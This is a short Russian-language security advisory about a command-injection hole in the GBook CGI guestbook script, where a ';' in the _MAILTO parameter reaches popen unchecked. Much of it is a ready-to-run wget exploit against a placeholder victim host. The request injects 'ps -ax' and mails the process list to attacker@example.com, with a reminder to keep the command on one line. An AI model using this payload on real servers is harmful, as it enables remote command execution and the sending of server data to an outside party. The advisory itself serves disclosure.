GBook CGI позволяет размещать на сайтах CGI форму для постов замечаний и сообщений в гостевую книгу. Эта CGI страдает от уязвимости, которая позволяет выполнить любую команду, используя параметр _MAILTO.

При использовании _MAILTO параметра, можно выполнять любую команду. Это происходит из-за неадекватных проверок, когда вызывается ‘popen’, чтобы выполнить команду почты. Если используется ‘;’ в переменной _MAILTO, то ты можешь выполнять любую команду с помощью этого.

Эксплоит:
Этот эксплоит выполняет команду «ps -ax» и
отправляет результаты на attacker@example.com.

wget «http://www.victim.com/cgi-bin/gbook/gbook.cgi?
_MAILTO=oops;ps%20-ax|mail%20 attacker@example.com&
_POSTIT=yes&
_NEWONTOP=yes&
_SHOWEMAIL=yes&
_SHOWURL=yes&
_SHOWCOMMENT=yes&
_SHOWFROM=no&
_NAME=attacker&
_EMAIL= attacker@example.com&
_URL=http://www.example.com&
_COMMENT=fwe&
_FROM=few»

Запомни: команда wget должна быть полностью на одной линии.



Оставить мнение